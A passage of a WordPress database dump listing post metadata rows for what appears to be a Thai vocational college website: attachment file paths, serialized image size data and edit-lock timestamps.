(6101, 2060, '_edit_lock', '1525242007:3'),
(6102, 2060, '_edit_last', '3'),
(6103, 2061, '_wp_attached_file', '2018/05/31698759_577622652613927_6823009321580756992_o.jpg'),
(6104, 2061, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/05/31698759_577622652613927_6823009321580756992_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"31698759_577622652613927_6823009321580756992_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"31698759_577622652613927_6823009321580756992_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"31698759_577622652613927_6823009321580756992_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"31698759_577622652613927_6823009321580756992_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"31698759_577622652613927_6823009321580756992_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6105, 2060, '_thumbnail_id', '2061'),
(6109, 2060, '_hide_featured', NULL),
(6110, 2060, '_wpas_done_all', '1'),
(6115, 2067, '_wp_attached_file', '2018/05/2-5-2561-13-59-36-2.jpg'),
(6116, 2067, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:913;s:6:\"height\";i:318;s:4:\"file\";s:31:\"2018/05/2-5-2561-13-59-36-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"2-5-2561-13-59-36-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"2-5-2561-13-59-36-2-300x104.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:104;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"2-5-2561-13-59-36-2-768x267.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"2-5-2561-13-59-36-2-400x139.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:139;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6117, 2060, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574835662;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4026;}i:1;a:1:{s:2:\"id\";i:6316;}i:2;a:1:{s:2:\"id\";i:6085;}}}}'),
(6118, 2070, '_edit_lock', '1526055767:3'),
(6119, 2070, '_edit_last', '3'),
(6120, 2071, '_wp_attached_file', '2018/05/ประกาศผลการสอบครูอัตราจ้าง.pdf'),
(6124, 2070, '_hide_featured', NULL),
(6125, 2070, '_wpas_done_all', '1'),
(6126, 2070, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574800974;s:7:\"payload\";a:0:{}}}'),
(6127, 2074, '_edit_lock', '1625040433:14'),
(6128, 2074, '_edit_last', '14'),
(6129, 2075, '_wp_attached_file', '2018/05/2-5-2561-15-57-55.jpg'),
(6130, 2075, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:196;s:6:\"height\";i:245;s:4:\"file\";s:29:\"2018/05/2-5-2561-15-57-55.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-5-2561-15-57-55-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6131, 2076, '_wp_attached_file', '2018/05/2-5-2561-15-58-24.jpg'),
(6132, 2076, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:582;s:6:\"height\";i:155;s:4:\"file\";s:29:\"2018/05/2-5-2561-15-58-24.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-5-2561-15-58-24-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"2-5-2561-15-58-24-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-5-2561-15-58-24-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6133, 2077, '_wp_attached_file', '2018/05/2-5-2561-15-55-21.jpg'),
(6134, 2077, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:893;s:6:\"height\";i:646;s:4:\"file\";s:29:\"2018/05/2-5-2561-15-55-21.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-5-2561-15-55-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-5-2561-15-55-21-300x217.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"2-5-2561-15-55-21-768x556.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:556;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-5-2561-15-55-21-400x289.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:289;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6135, 2074, '_hide_featured', NULL),
(6136, 2080, '_wp_attached_file', '2018/05/2-5-2561-16-33-38.jpg'),
(6137, 2080, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:880;s:6:\"height\";i:643;s:4:\"file\";s:29:\"2018/05/2-5-2561-16-33-38.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-5-2561-16-33-38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-5-2561-16-33-38-300x219.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:219;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"2-5-2561-16-33-38-768x561.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:561;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-5-2561-16-33-38-400x292.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:292;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6140, 2084, '_wp_attached_file', '2018/05/2-5-2561-16-36-26.jpg'),
(6141, 2084, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:912;s:6:\"height\";i:642;s:4:\"file\";s:29:\"2018/05/2-5-2561-16-36-26.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"2-5-2561-16-36-26-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"2-5-2561-16-36-26-300x211.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"2-5-2561-16-36-26-768x541.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"2-5-2561-16-36-26-400x282.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6149, 2089, '_wp_attached_file', '2018/01/201805041556.pdf'),
(6150, 2090, '_wp_attached_file', '2018/01/ค่าลงทะเบียนเรียน-ระดับ-ปวส..pdf'),
(6151, 2091, '_wp_attached_file', '2018/01/ค่าลงทะเบียนเรียน-ระดับ-ปวช.pdf'),
(6152, 2092, '_wp_attached_file', '2018/01/201805041557-2.pdf'),
(6165, 2099, '_wp_attached_file', '2018/01/ค่าลงทะเบียนเรียน-ระดับ-ปวส.-1.pdf'),
(6210, 2123, '_wp_attached_file', '2018/05/e-Student-ระยอง-ver.-2.pdf'),
(6222, 2139, '_wp_attached_file', '2018/01/rtc-e-student-ver-2.pdf'),
(6223, 2149, '_edit_lock', '1525587197:4'),
(6224, 2149, '_edit_last', '4'),
(6232, 2156, '_wp_attached_file', '2018/05/20100887_10061619190731.gif'),
(6233, 2156, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:28;s:6:\"height\";i:14;s:4:\"file\";s:35:\"2018/05/20100887_10061619190731.gif\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6234, 2157, '_wp_attached_file', '2018/05/vit21.pptx'),
(6235, 2158, '_wp_attached_file', '2018/05/การประเมินตนเองและการจัดทำ-ID-PLAN.pptx'),
(6236, 2159, '_wp_attached_file', '2018/05/แนวทางการขับเคลื่อนกระบวนการ-PLC.pptx'),
(6237, 2160, '_wp_attached_file', '2018/05/3.แบบประเมินสมรรถนะ-แบ่งตามวิทยฐานะ.doc'),
(6238, 2161, '_wp_attached_file', '2018/05/PLC_Action_Plan-1.docx'),
(6239, 2162, '_wp_attached_file', '2018/05/PLC-Cycle-Report_-Demo-BPCD-2018-1-1.docx'),
(6240, 2163, '_wp_attached_file', '2018/05/LTeacher-1234567891234-สมชาย-ใจดี-1-2.xlsm'),
(6241, 2165, '_wp_attached_file', '2018/05/Ex10.jpg'),
(6242, 2165, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:300;s:4:\"file\";s:16:\"2018/05/Ex10.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"Ex10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"Ex10-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:16:\"Ex10-400x200.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(6243, 2169, '_edit_lock', '1542010609:4'),
(6244, 2169, '_edit_last', '4'),
(6245, 2169, '_hide_featured', NULL),
(6246, 2189, '_edit_lock', '1542003902:4'),
(6247, 2189, '_edit_last', '4'),
(6248, 2189, '_hide_featured', NULL),
(6252, 2215, '_edit_lock', '1526703240:4'),
(6253, 2215, '_edit_last', '4'),
(6254, 2215, '_hide_featured', NULL),
(6255, 2222, '_edit_lock', '1526333823:4'),
(6256, 2222, '_edit_last', '4'),
(6257, 2222, '_hide_featured', NULL),
(6258, 2227, '_edit_lock', '1525623723:4'),
(6259, 2227, '_edit_last', '4'),
(6260, 2227, '_hide_featured', NULL),
(6261, 2231, '_edit_lock', '1526513022:4'),
(6262, 2231, '_edit_last', '4'),
(6263, 2231, '_hide_featured', NULL),
(6264, 2235, '_edit_lock', '1526513410:4'),
(6265, 2235, '_edit_last', '4'),
(6266, 2235, '_hide_featured', NULL),
(6267, 2238, '_edit_lock', '1527836644:3'),
(6268, 2238, '_edit_last', '4'),
(6269, 2238, '_hide_featured', NULL),
(6270, 2243, '_edit_lock', '1538081452:4'),
(6271, 2243, '_edit_last', '4'),
(6272, 2243, '_hide_featured', NULL),
(6273, 2246, '_edit_lock', '1526333678:4'),
(6274, 2246, '_edit_last', '4'),
(6275, 2246, '_hide_featured', NULL),
(6276, 2250, '_edit_lock', '1526334021:4'),
(6277, 2250, '_edit_last', '4'),
(6278, 2250, '_hide_featured', NULL),
(6279, 2254, '_edit_lock', '1525620631:4'),
(6280, 2254, '_edit_last', '4'),
(6281, 2254, '_hide_featured', NULL),
(6282, 2258, '_edit_lock', '1526334673:4'),
(6283, 2258, '_edit_last', '4'),
(6284, 2258, '_hide_featured', NULL),
(6285, 2262, '_edit_lock', '1526333444:4'),
(6286, 2262, '_edit_last', '4'),
(6287, 2262, '_hide_featured', NULL),
(6288, 2266, '_edit_lock', '1526334561:4'),
(6289, 2266, '_edit_last', '4'),
(6290, 2266, '_hide_featured', NULL),
(6291, 2270, '_edit_lock', '1526334586:4'),
(6292, 2270, '_edit_last', '4'),
(6293, 2270, '_hide_featured', NULL),
(6294, 2274, '_edit_lock', '1526333974:4'),
(6295, 2274, '_edit_last', '4'),
(6296, 2274, '_hide_featured', NULL),
(6297, 2278, '_edit_lock', '1526703403:4'),
(6298, 2278, '_edit_last', '4'),
(6299, 2278, '_hide_featured', NULL),
(6300, 2282, '_edit_lock', '1526703289:4'),
(6301, 2282, '_edit_last', '4'),
(6302, 2282, '_hide_featured', NULL),
(6303, 2286, '_edit_lock', '1526703413:4'),
(6304, 2286, '_edit_last', '4'),
(6305, 2286, '_hide_featured', NULL),
(6306, 2290, '_edit_lock', '1526333364:4'),
(6307, 2290, '_edit_last', '4'),
(6308, 2290, '_hide_featured', NULL),
(6311, 2294, '_edit_lock', '1526703429:4'),
(6312, 2294, '_edit_last', '4'),
(6313, 2294, '_hide_featured', NULL),
(6314, 2298, '_edit_lock', '1525621398:4'),
(6315, 2298, '_edit_last', '4'),
(6316, 2298, '_hide_featured', NULL),
(6317, 2302, '_edit_lock', '1525621448:4'),
(6318, 2302, '_edit_last', '4'),
(6319, 2302, '_hide_featured', NULL),
(6320, 2306, '_edit_lock', '1525621519:4'),
(6321, 2306, '_edit_last', '4'),
(6322, 2306, '_hide_featured', NULL),
(6333, 2312, '_edit_lock', '1525621633:4'),
(6334, 2312, '_edit_last', '4'),
(6335, 2312, '_hide_featured', NULL),
(6336, 2316, '_edit_lock', '1525621684:4'),
(6337, 2316, '_edit_last', '4'),
(6338, 2316, '_hide_featured', NULL),
(6339, 2321, '_edit_lock', '1525621876:4'),
(6340, 2321, '_edit_last', '4'),
(6341, 2321, '_hide_featured', NULL),
(6342, 2353, '_wp_attached_file', '2018/01/ประก่าศ-การลงทะเบียนเรียนประจำภาคเรียนที่-1-2561.pdf'),
(6343, 2355, '_wp_attached_file', '2018/05/แบบฟอร์ม-ขออนุญาตไปราชการวิทยาลัย.pdf'),
(6344, 2358, '_wp_attached_file', '2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557.pdf'),
(6345, 2359, '_wp_attached_file', '2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติการ-2557ต่อ.pdf'),
(6346, 2360, '_edit_lock', '1525746270:3'),
(6347, 2360, '_edit_last', '3'),
(6348, 2360, '_hide_featured', NULL),
(6349, 2364, '_edit_lock', '1525747306:3'),
(6350, 2364, '_edit_last', '3'),
(6351, 2365, '_wp_attached_file', '2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2558.pdf'),
(6352, 2366, '_wp_attached_file', '2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2558ต่อ.pdf'),
(6353, 2364, '_hide_featured', NULL),
(6354, 2371, '_edit_lock', '1525747281:3'),
(6355, 2371, '_edit_last', '3'),
(6358, 2373, '_wp_attached_file', '2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2559.pdf'),
(6359, 2374, '_wp_attached_file', '2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2559ต่อ.pdf'),
(6360, 2371, '_hide_featured', NULL),
(6361, 2378, '_edit_lock', '1525749652:3'),
(6362, 2378, '_edit_last', '3'),
(6363, 2380, '_wp_attached_file', '2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560.pdf'),
(6364, 2381, '_wp_attached_file', '2018/05/รายงานผลการปฏิบัติงานตามแผนปฏิบัติ-ปีงบประมาณ-2560ต่อ.pdf'),
(6365, 2378, '_hide_featured', NULL),
(6369, 2388, '_edit_lock', '1625120341:14'),
(6370, 2388, '_edit_last', '14'),
(6371, 2389, '_wp_attached_file', '2018/05/8-5-2561-10-32-12.jpg'),
(6372, 2389, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:189;s:6:\"height\";i:238;s:4:\"file\";s:29:\"2018/05/8-5-2561-10-32-12.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-32-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6373, 2390, '_wp_attached_file', '2018/05/8-5-2561-10-33-02.jpg'),
(6374, 2390, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:155;s:4:\"file\";s:29:\"2018/05/8-5-2561-10-33-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-33-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"8-5-2561-10-33-02-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-33-02-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6375, 2391, '_wp_attached_file', '2018/05/8-5-2561-10-33-32.jpg'),
(6376, 2391, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:958;s:6:\"height\";i:643;s:4:\"file\";s:29:\"2018/05/8-5-2561-10-33-32.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-33-32-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-33-32-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-33-32-768x515.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:515;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-33-32-400x268.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:268;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6377, 2392, '_wp_attached_file', '2018/05/8-5-2561-10-34-14.jpg'),
(6378, 2392, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:957;s:6:\"height\";i:632;s:4:\"file\";s:29:\"2018/05/8-5-2561-10-34-14.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-34-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-34-14-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-34-14-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-34-14-400x264.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:264;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6379, 2393, '_wp_attached_file', '2018/05/8-5-2561-10-34-44.jpg'),
(6380, 2393, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:957;s:6:\"height\";i:639;s:4:\"file\";s:29:\"2018/05/8-5-2561-10-34-44.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-34-44-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-34-44-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-34-44-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"8-5-2561-10-34-44-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6381, 2388, '_hide_featured', NULL),
(6382, 2396, '_edit_lock', '1624864632:14'),
(6383, 2396, '_edit_last', '14'),
(6384, 2397, '_wp_attached_file', '2018/05/8-5-2561-11-54-19.jpg'),
